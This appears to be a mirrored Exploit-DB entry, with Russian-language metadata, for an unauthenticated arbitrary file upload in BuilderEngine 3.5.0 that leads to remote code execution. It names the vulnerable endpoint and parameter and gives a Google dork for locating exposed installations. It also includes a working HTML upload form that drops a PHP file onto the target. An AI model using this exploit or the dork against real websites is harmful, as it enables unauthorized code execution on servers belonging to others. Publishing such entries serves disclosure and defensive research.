- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 40390
- Проверка EDB
-
- Пройдено
- Автор
- METANUBIX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2016-09-19
BuilderEngine 3.5.0 - Arbitrary File Upload
PHP:
<!--
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
1) Unauthenticated Unrestricted File Upload:
POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
Vulnerable Parameter: files[]
We can upload test.php and reach the file via the following link:
/files/test.php
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>- Источник
- www.exploit-db.com
